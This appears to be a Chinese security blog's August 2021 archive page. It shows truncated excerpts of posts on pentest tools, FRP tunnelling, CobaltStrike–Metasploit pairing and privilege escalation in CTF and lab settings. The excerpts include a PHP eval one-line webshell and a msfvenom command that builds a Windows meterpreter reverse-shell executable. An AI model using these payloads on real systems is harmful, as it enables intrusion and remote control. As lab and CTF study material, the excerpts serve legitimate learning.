月度归档: 2021年8月

7 篇文章

thumbnail
【原创 精华 付费】常用渗透工具的使用
泄露 github泄露 githack(python2环境) python GitHack.py http://challenge-dd0303e023385e74.sandbox.ctfhub.com:10800/.git 进入dist目录会生成一个带有.git隐藏文件的目录,进入目录 git log //查看历史信息 找到add就是本次的提交 git reset --hard 511af1a4…
thumbnail
【原创】内网穿透案例
[huayang] 案列一(Frp内网渗透) 大概图列 网上随便找的,路线是这个样子 这里选用ctfshow的一道命令执行题 由Frp实现内网访问及扫描 1.传入一句话,上线蚁剑 http://b85fdf24-b98e-4810-9e76-a038a8987630.challenge.ctf.show:8080/?c=`echo '<?php eval(\$_POST[1]);?&…
thumbnail
【原创 精华】CobaltStrike与msf联动
[huayang] 基础 大致使用方法 注意:这里创建的ip指向的开cs服务器的ip不是cs应用的ip 如果kali开服务 win开应用 则下面的ip指向kali cs与msf联动 cs发送给msf cs拿到服务器后再新建个监听 建好过后去msf开启监听 run一下 进入beacon即可看见运行 这样就顺利连上了 msf发送给cs 比如我在msf上提权过后发送给cs 首先提权 提权成功后 use …
thumbnail
【原创】macOS安装CobaltStrike(内网,公网)
[huayang] 这个必须在linux下环境启用且拥有java环境 所以最好的办法就是在kali里搭建 首先把文件移到kali,给权限 搭建服务 kali的ip加密码 这样就算启动好了,再去物理机ping kali,能通就直接打开cs https://hellohy.top/huayang/7146.html [/huayang]
thumbnail
【原创】macOS下PhpStorm 配置
[huayang] 下载地址:https://www.jetbrains.com/phpstorm/download/#section=mac mamp下载地址:https://www.mamp.info/en/downloads/ 非永久激活:http://idea.medeming.com/jets/ 外观 服务 配置mamp 打开mamp,点击设置 放在要测试的php文件夹即可 最后点击st…
thumbnail
MSF简单提权开启远程桌面并连接
[huayang] 攻击机: kali:172.16.181.8 win sever2012 :172.16.181.4 目标机: win7:172.16.181.9 建立连接 msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.181.8 LPORT=4444 -f exe -o 123.exe 把马放入目标机,因为我的虚拟机有点小问…
thumbnail
【原创 精华】一些其他的小技巧
[huayang] 传文件 拿到shell后我们需要把文件传到目标机 现在我们是低权限,不能随便传目录 只有传送users目录下的用户 不知道用户名怎么办? 我们先cd C:\users再ls看看即可 知道了用户名我们最好传入文档里(记得是两个反斜杠\\),也就是C:\Users\华扬\Documents 注意“C”一定要大写!!! shell 乱码就chcp65001 木马 目标机上木马无法打开…